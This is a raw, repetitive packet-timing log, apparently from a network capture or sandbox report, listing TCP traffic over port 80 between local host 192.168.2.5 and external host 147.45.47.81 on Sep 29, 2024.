                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368057013 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368092060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368125916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368140936 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368158102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368168116 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368210077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368242025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368274927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368284941 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368313074 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368345022 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368362904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368396044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368427992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368443012 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368460894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368470907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368510962 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368542910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368573904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368586063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368607998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368617058 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368640900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368690968 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368700027 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368725061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368760109 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368772030 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368810892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368848085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368858099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368879080 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368911028 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368943930 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368949890 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368984938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.368993044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369026899 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369057894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369090080 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369103909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369122982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369136095 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369158983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369187117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369219065 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369229078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369251966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369261026 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369286060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369317055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369349957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369365931 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369383097 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369394064 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369415998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369448900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369482040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369496107 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369515896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369524956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369548082 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369580984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369612932 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369625092 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369645119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369654894 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369674921 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369709015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369740963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369752884 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369774103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369781971 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369808912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369841099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369843960 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369894981 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369923115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.369967937 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370177984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370210886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370225906 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370244980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370277882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370326996 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370332003 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370378017 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370382071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370415926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370457888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370498896 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370516062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370560884 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370565891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370599985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370634079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370666027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370676041 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370699883 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370708942 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370733023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370764971 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370776892 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370798111 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370827913 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370862007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370877028 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370894909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370908976 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370929003 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370960951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.370991945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371006966 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371023893 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371037006 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371058941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371092081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371124029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371134996 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371157885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371166945 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371193886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371226072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371259928 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371270895 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371293068 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371304035 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371326923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371360064 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371408939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371414900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371447086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371457100 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371479988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371514082 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371546984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371557951 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371582985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.371594906 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372174978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372222900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372256994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372277021 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372288942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372309923 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372323036 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372356892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372389078 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372397900 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372421980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372430086 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372456074 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372488976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372523069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372531891 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.372566938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.441977024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442043066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442080021 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442104101 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442112923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442148924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442181110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442198992 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442214966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442224026 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442253113 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.442336082 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.454797983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.454850912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.454885006 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.454904079 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.454955101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.454989910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455003977 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455039978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455074072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455085993 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455122948 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455157042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455189943 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455203056 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455224037 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455231905 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455274105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455307007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455338001 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455358982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455377102 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455416918 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455450058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455482006 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455491066 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455514908 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455530882 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455549002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455581903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455629110 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455648899 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455693007 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455698967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455733061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455765009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455810070 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455810070 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455859900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455868006 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455893040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455944061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455972910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.455988884 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456006050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456012964 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456042051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456104994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456146002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456171036 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456176043 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456193924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456231117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456263065 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456295013 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456306934 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456327915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456337929 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456378937 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456428051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456449986 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456463099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456496000 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456516027 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456528902 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456561089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456593037 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456602097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456624031 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456631899 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456659079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456692934 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456724882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456731081 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456769943 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456783056 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456804037 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456840992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456862926 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456875086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456907988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456940889 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456955910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456974983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.456989050 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457009077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457041025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457053900 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457075119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457107067 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457140923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457165956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457174063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457184076 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457207918 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457240105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457284927 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457357883 CEST8049706147.45.47.81192.168.2.5
